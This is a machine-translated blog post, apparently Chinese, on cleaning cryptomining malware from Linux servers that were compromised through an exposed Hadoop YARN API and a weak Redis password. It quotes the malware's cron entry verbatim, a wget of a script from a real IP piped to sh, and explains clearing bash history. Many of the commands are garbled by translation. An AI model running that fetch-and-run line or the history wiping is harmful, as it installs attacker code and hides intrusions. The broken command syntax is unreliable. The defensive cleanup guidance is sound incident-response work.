Analysis of mine-digging procedure poisoning (this article is not enough)

This is not, yesterday in the friend Technology group and saw the mining was poisoned scene ...

Suddenly think of their own help daughter-in-law company handled the Hadoop management platform yarn Weak password vulnerability is exploited,

Thus became the past of the miners ' captives.

Previous case phenomena:

Visit the yarn:8088 page and find a mission running.

Users for Dr.Who, ask the internal use of personnel, there is no task in running;

Conclusion:

The server was poisoned by the use of the Hadoop Yarn Resource management system REST API to not authorize the vulnerability to the server , the person can be unauthorized to remotely execute code security issues to be alerted.

Using the top command to find that the CPU uses more than 360%, the system will be very card.

Workaround:

1. Kill this process by looking at the CPU high process

2, check the/TMP and/var/tmp directories, delete Java, PPC, w.conf and other exception files

3, through Crontab-l view there is A * wget-q-o-http://46.249.38.186/cr.sh | SH >/dev/null 2>&1 task, delete this task

4, troubleshoot yarn logs, confirm abnormal application, delete processing

Then through the top verification to see if there is a high CPU process, if any, kill, no words should be normal.

Note: Yarn provides a REST API with default open in 8088 and 8090 (the default former) allows users to make related app creation, task commit execution, and so on directly through the API, and if misconfigured, the rest API will open up issues that cause unauthorized access in the public domain, then any Can be used for remote command execution, mining and other activities, directly using the Open 8088 Rest API to submit execution commands, To implement the download execution. SH script in the server to further download the startup mining program to achieve the purpose of mining, so note and enable the Kerberos authentication feature, prohibit anonymous access modify port 8088

So, volunteered, thought it was a similar situation.

Technical Group Dialogue ~ ~

Encrypted script content:

Post-decryption script excerpt:

So I couldn't help it,

Asked the next self remote connection fencing

Deleted a few tries,

Follow the script in the opposite direction

The result is still not clean. Top can see CPU 100% full.

It is not clear that the program is occupied.

Because of the network delay, No.

So I wanted to be sure that top was replaced,

Keep looking at the script,

It was a picture embedded in a forged library file of the same name,

At the same time the library file invokes the download program execution script,

Top the program runs automatically, and the descendants are endless.

(The script is a graph that is decrypted and then placed on its own server)

I wanted to kill this top library file,

But because of the seductive nature of naming,

Plus a program that doesn't kill clean

When the RM-RF is executed,

Also obviously feel the tension of each other's friends.

So when you know your business,

The business of discovering machine impact is not serious.

Also soon off work, so don't want to toss again.

Carefully slipped the script again,

Want to install the system before and the other friends rose posture,

But feeling the other friend

is not willing to study this problem thoroughly,

It is recommended that it be re-installed.

Afterwards, take the subway to summarize.

Common methods of treatment of mining poisoning procedure

Process of thinking and suggested methods.

1. How the server will be mining * * * Program

Broiler weak password Webshell XSS software vulnerability bug redis ZK mysql 0day yarn etc. causes the server to be scanned and raised right.

2 in the first instance, we kill the mining program and it will get up.

Did not clean up the scheduled task command to modify the boot file history

3. How do I handle it?

First of all, according to business decision, cause business failure, can choose HA scheme to cut off the application services, the server to cut off all network sources, and related processing.

Of course, the general treatment scheme is this, first through the iptables or firewalls firewall means to seal the address, similar and cut off the network source, then we can analyze and deal with the cause of mining.

The method of processing can be analyzed according to the mining script one for processing the modified commands and files for recovery and deletion.

Later, the system and the Web for security testing, to repair the system vulnerabilities.

Linux Backdoor intrusion detection tools Chkrootkit, rkhunter and so on patrol.

System file MD5 value comparison. In fact, the biggest factor of security is people.

Of course, monitoring is also very important.

4. This reason analysis

Redis has a weak password caused by this failure problem, Redis can be configured by config configuration directory to modify the configuration of the server to put its own key in order to achieve the purpose of server power.

Redis unauthorized access defects can easily cause the system to be hacked:

https://www.seebug.org/vuldb/ssvid-89715

I suggest a similar post-Incident processing command:

See which process occupies the cup

Through top or using PS aux

This case through the top command does not see which process consumes the cup, after viewing the script execution cat/etc/ld.so.preload inside also loaded the exception file, judging is used to hide the process, it is recommended to comment out or delete its contents, execute ldconfig and then use the top View the next process;

!

Doubt:

Script inside the browser can open the picture, the local cannot open. The suspicion is steganography (backstage pass)

The local cannot open, the hidden writing tool also cannot open.

Using Ls-lt/etc | Head View Recent changes to the file directory

or use the Find command to add parameter stat to find recently modified files

Of course, if it is careful, it will modify the file change time point.

Find the process file Delete, execute any of these 1 commands can

Ps-ef | grep shutdown [command]

PS aux | Grep/bin/bash [Command Path]

PS aux | grep bash [command]

Lsof-p PID

cd/proc/4170 [PID]

Find out all the zombie processes in the system

PS aux | grep ' defunct '

Or

Ps-ef | grep defunct | Grep-v grep | Wc-l

Clean up the zombie process

PS-E-O Ppid,stat | grep Z | Cut-d ""-f2 | Xargs kill-9

Or

Kill-hupps -A -ostat,ppid | grep -e ‘^[Zz]‘ | awk ‘{print $2}‘

Find scheduled tasks in the system

Crontab-l

Or

Cd/var/spool/cron #查看这个文件夹下的文件删除

Vim/etc/crontab

There will be a scheduled task and generally cannot be deleted. Browser Open URL is a script, through Base64 encryption, decryption can see the contents of the script.

Also pay attention to the random startup script.

According to the script to delete the files created by the script, I would expect to delete the

/usr/local/lib/dns.so,/etc/ld.so.preload

Viewing the System logon log

Log file/var/log/wtmp, every time the system logs in, the record is added to this log, in order to prevent tampering, the file is a binary file

Cd/var/log; Last or Last-f/var/log/wtmp

Of course, in this case, the logs are all erased.

Delete history Action Command, prevent * * * Enter to see what you have done

History command to view historical commands

History-c is to clear the history of the current shell, because the system will generally keep the information in a file, as long as the contents of the file does not change, then the information will not change. The file that holds the history command in Linux is. bash_history, emptying the file (echo ' >/root/.bash_history), and those historical commands will be emptied.

It would not be successful to call History-c to empty the current Shell's history command in a shell script, because bash executes the command by default when it produces a child process to execute the command, and executing history-c in the child process is not the history command of your current shell.

You can use source to execute a script (source./script), which refers to executing commands in the current bash environment.

Close ports that you do not need

Block access to the mining server by masking the domain name IP in the script

Iptables-a input-s xmr.crypto-pool.fr-j Drop iptables-a output-d xmr.crypto-pool.fr-j drop

If Redis is installed, modify the Redis port to set a more complex password.

The big boys read more message advice.

Don't ever do this!

Analysis of mine-digging procedure poisoning (this article is not enough)